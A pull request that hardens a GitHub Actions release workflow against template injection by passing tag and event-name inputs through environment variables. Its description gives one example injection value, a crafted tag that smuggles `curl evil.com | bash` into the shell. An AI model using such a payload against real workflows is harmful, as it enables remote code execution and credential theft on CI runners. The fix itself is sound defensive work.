### PR TITLE
fix(ci): prevent template injection in release workflow

### DIFF
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -35,15 +35,16 @@ jobs:
           persist-credentials: true
 
       - if: github.event_name == 'workflow_dispatch'
+        env:
+          TAG: ${{ inputs.tag }}
         run: |
-          tag="${{ inputs.tag }}"
-          if git rev-parse -q --verify "refs/tags/$tag" >/dev/null; then
-            echo "Tag $tag exists"
+          if git rev-parse -q --verify "refs/tags/$TAG" >/dev/null; then
+            echo "Tag $TAG exists"
           else
             git config user.name "github-actions[bot]"
             git config user.email "github-actions[bot]@users.noreply.github.com"
-            git tag -a "$tag" -m "Release $tag"
-            git push origin "$tag"
+            git tag -a "$TAG" -m "Release $TAG"
+            git push origin "$TAG"
           fi
 
       - uses: pnpm/action-setup@v5
@@ -66,11 +67,14 @@ jobs:
           sha256sum dist.tar.gz | tee dist.tar.gz.sha256
 
       - id: meta
+        env:
+          EVENT_NAME: ${{ github.event_name }}
+          INPUT_TAG: ${{ inputs.tag }}
         run: |
-          if [ "${{ github.event_name }}" = "push" ]; then
+          if [ "$EVENT_NAME" = "push" ]; then
             echo "tag=${GITHUB_REF_NAME}" >> "$GITHUB_OUTPUT"
           else
-            echo "tag=${{ inputs.tag }}" >> "$GITHUB_OUTPUT"
+            echo "tag=$INPUT_TAG" >> "$GITHUB_OUTPUT"
           fi
 
       - uses: softprops/action-gh-release@v2


### PR DESCRIPTION
Replaces direct `${{ inputs.tag }}` and `${{ github.event_name }}` interpolation in `run:` blocks with environment variables.

GitHub Actions expands `${{ }}` expressions before bash executes, so a crafted tag value like `"; curl evil.com | bash; echo "` could inject arbitrary shell commands. Using `env:` blocks passes values as proper environment variables, preventing injection.

While `workflow_dispatch` requires write access (limiting practical exploitability today), this is a defensive best practice.

Prompted by: zerosnacks